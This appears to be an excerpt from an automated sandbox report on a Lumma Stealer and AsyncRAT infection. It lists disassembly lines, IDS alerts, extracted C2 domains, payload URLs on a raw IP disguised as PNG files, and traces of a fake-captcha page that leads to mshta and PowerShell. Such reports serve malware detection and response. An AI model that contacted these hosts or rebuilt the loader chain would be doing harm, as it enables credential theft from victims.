                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl13_2_0042E002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl13_2_0042E002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax13_2_0042A810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax13_2_004288BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [edx]13_2_00402940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]13_2_0040A910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax13_2_004161DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]13_2_004251E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]13_2_00427A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push dword ptr [esp+28h]13_2_00426A00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]13_2_0040BA29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_00438AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ebx], cx13_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [esi], cx13_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]13_2_004082A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h13_2_0040CB44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]13_2_0043EB00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax13_2_00420B10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax13_2_00440310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]13_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]13_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]13_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]13_2_0041DC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]13_2_00417451
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]13_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]13_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h13_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi13_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al13_2_0042D420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h13_2_00415C25
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_0042B430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add ebp, edi13_2_00408CD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx13_2_00426D70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], cl13_2_0042DD30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]13_2_0042E5C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax13_2_004165EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]13_2_00415590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx13_2_004095A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax13_2_00415E42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00423E44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h13_2_00413E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h13_2_0040DE72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]13_2_00425E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]13_2_00425E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h13_2_0043EE10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00408EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]13_2_0041DEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]13_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]13_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh13_2_004427E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al13_2_0042E7EB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h13_2_0040DFEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al13_2_0042F799
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al13_2_0042DFAF

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.5:64755 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.5:64529 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.5:56734 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.5:57853 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.5:63101 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.5:57974 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.2.5:49714
                  Source: Network trafficSuricata IDS: 2059221 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat) : 192.168.2.5:50383 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.5:58720 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.5:58090 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49711 -> 104.102.49.254:443
                  Source: Malware configuration extractorURLs: curtainykeo.lat
                  Source: Malware configuration extractorURLs: kickykiduz.lat
                  Source: Malware configuration extractorURLs: bloodyswif.lat
                  Source: Malware configuration extractorURLs: miniatureyu.lat
                  Source: Malware configuration extractorURLs: finickypwk.lat
                  Source: Malware configuration extractorURLs: leggelatez.lat
                  Source: Malware configuration extractorURLs: shoefeatthe.lat
                  Source: Malware configuration extractorURLs: washyceehsu.lat
                  Source: Malware configuration extractorURLs: savorraiykj.lat
                  Source: unknownDNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: 56.163.245.4.in-addr.arpa replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: curtainykeo.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)
                  Source: global trafficTCP traffic: 192.168.2.5:49714 -> 92.255.57.112:56001
                  Source: global trafficTCP traffic: 192.168.2.5:51338 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.102.49.254:443
                  Source: global trafficHTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
                  Source: global trafficHTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
                  Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=aa43d1ebae0c2f87f653d5ac; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 15 Jan 2025 09:09:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: view-reserve.com
                  Source: global trafficDNS traffic detected: DNS query: curtainykeo.lat
                  Source: global trafficDNS traffic detected: DNS query: bloodyswif.lat
                  Source: global trafficDNS traffic detected: DNS query: washyceehsu.lat
                  Source: global trafficDNS traffic detected: DNS query: leggelatez.lat
                  Source: global trafficDNS traffic detected: DNS query: miniatureyu.lat
                  Source: global trafficDNS traffic detected: DNS query: kickykiduz.lat
                  Source: global trafficDNS traffic detected: DNS query: savorraiykj.lat
                  Source: global trafficDNS traffic detected: DNS query: shoefeatthe.lat
                  Source: global trafficDNS traffic detected: DNS query: finickypwk.lat
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                  Source: global trafficDNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
                  Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112
                  Source: powershell.exe, 00000005.00000002.2322554661.0000024BF78C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316180229.0000024BF5AB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/1.png
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/1.pngX
                  Source: mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107461816.0000020E2D337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080358454.0000020E2CD48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107815203.0000020E2D33C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108179750.0000020E2D33E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080226546.0000020E2CCF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D3B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2075726881.0000020E2CE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107032290.0000020E2D331000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107883521.0000020E2D33D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107661339.0000020E2D33A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107514434.0000020E2D338000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2087511718.0000020E2CD63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079624291.0000020E2CD2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107724247.0000020E2D33B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152977377.0000020E2CD7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/2.png
                  Source: powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/2.pngX
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D0804B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/3.png
                  Source: mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105797208.0000020E2CE99000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105602304.0000020E2CE96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105700897.0000020E2CE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/3.png$TC=$TC.replace(
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.112/1/3.pngX
                  Source: powershell.exe, 00000007.00000002.2134150506.0000022D81662000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.H
                  Source: powershell.exe, 00000005.00000002.2129677364.0000024B81662000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.H2
                  Source: powershell.exe, 00000008.00000002.2132331427.000001D081661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.Hr
                  Source: svchost.exe, 00000004.00000002.3291805384.000001A4C5000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
